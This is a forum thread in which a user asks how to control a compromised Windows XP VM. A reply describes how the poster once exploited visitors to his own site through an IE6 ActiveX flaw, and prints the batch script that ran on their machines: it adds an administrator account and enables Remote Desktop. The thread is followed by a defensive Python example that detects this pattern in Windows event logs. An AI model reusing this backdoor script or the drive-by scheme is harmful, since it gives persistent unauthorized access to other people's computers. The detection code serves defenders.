Hello all,

I'm new on the forum and a bit of a noob when it comes to BackTrack.

Here is the setup:

Using VMs I have a setup of 2 machines: XP SP3 and BackTrack 5 R3.

Using Armitage I gained control of the XP machine, but I was wondering if there is any way to remotely install software on that XP machine.


English is not my first language, so I may not have raised my point clearly enough.

Using Armitage I could launch a command prompt and see documents and such, but I was wondering if there is a solution like Remote Desktop or something, not necessarily using Armitage, but other tools.

Let's say that on the XP machine there is a piece of software running and I want to remotely control that software. I can gain access to the XP machine, but how can I control that software...


If you compromised the machine and escalated yourself to admin, you could most certainly install anything you wanted, for the most part. Some GUI programs even have command line switches to run them silently and accept all EULAs, for example.

As for controlling software, you could also enable RDP via the command line, or run a reverse VNC install and just remote in over the GUI as well, as if you were sitting at the machine, and do whatever you wanted that way too. Pretty much anything is possible if you've gained elevated privileges. I used to have a bat script I set up for turning on RDP and adding another user to the system. I used to keep it on one of my sites back in the day, which would exploit Internet Explorer: in the event they tried to attack my site and got the error page, it would detect if they had IE6 and run the ActiveX exploit, then make them run the bat file, which enabled RDP and added an admin user for me, so long as they were logged on with admin privileges. Most Windows XP users were back then, always the admin, and not smart enough to set up limited user accounts for web surfing from home.

Edit: had to find the bat script. Not sure if this even works still.

@echo off
net user stupid password /add && net localgroup Administrators stupid /add
SC config "TermService" start= "auto"
NET START "Terminal Services"
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F
@echo on
echo Success!

Edited by digip
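From the defender's side, the batch file above leaves a very recognisable trail: an account creation, an add to Administrators, a TermService start-type change and fDenyTSConnections flipped to 0, all within seconds. The following is an added example (not from the thread or its author) that correlates those steps over constructed, simplified event records; the event IDs are the Vista+ Security/System log IDs (4720, 4732, 4657, 7040), and 4657 assumes registry auditing is enabled on that key.

```python
from collections import defaultdict
from datetime import datetime

WINDOW_SECONDS = 300  # assumption: the whole script completes within a few minutes

# Constructed sample events, not real logs. Field names are simplified from the
# Windows Security/System event fields; IDs are the Vista+ ones, not XP's 6xx series.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:01", "id": 4720, "host": "XP-VM", "target": "stupid"},
    {"ts": "2024-01-01T10:00:02", "id": 4732, "host": "XP-VM", "group": "Administrators", "member": "stupid"},
    {"ts": "2024-01-01T10:00:03", "id": 7040, "host": "XP-VM", "service": "TermService", "new_start": "auto start"},
    {"ts": "2024-01-01T10:00:04", "id": 4657, "host": "XP-VM", "value": "fDenyTSConnections", "new_data": "0"},
    # A lone RDP enable on another host: possibly legitimate, but worth a look.
    {"ts": "2024-01-01T11:30:00", "id": 4657, "host": "FILE-SRV", "value": "fDenyTSConnections", "new_data": "0"},
    {"ts": "2024-01-01T12:00:00", "id": 4732, "host": "FILE-SRV", "group": "Administrators", "member": "helpdesk"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def _enables_rdp(event):
    """True for the two changes the script makes: TermService start type, fDenyTSConnections=0."""
    return (event["id"] == 4657 and event.get("value") == "fDenyTSConnections"
            and event.get("new_data") == "0") \
        or (event["id"] == 7040 and event.get("service") == "TermService")


def detect_rdp_backdoor(events, window=WINDOW_SECONDS):
    """Return {host: severity}. 'high' when an account created on the host is added to
    Administrators and RDP is enabled within `window` seconds of that add; 'low' when
    RDP is enabled with no such freshly created admin (could be a legitimate change)."""
    by_host = defaultdict(list)
    for event in sorted(events, key=_ts):
        by_host[event["host"]].append(event)
    result = {}
    for host, evs in by_host.items():
        created = {e["target"] for e in evs if e["id"] == 4720}
        severity = "low" if any(_enables_rdp(e) for e in evs) else None
        for i, e in enumerate(evs):
            if e["id"] == 4732 and e.get("group") == "Administrators" and e["member"] in created:
                t0 = _ts(e)
                if any(_enables_rdp(x) and (_ts(x) - t0).total_seconds() <= window for x in evs[i:]):
                    severity = "high"
        if severity:
            result[host] = severity
    return result
```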
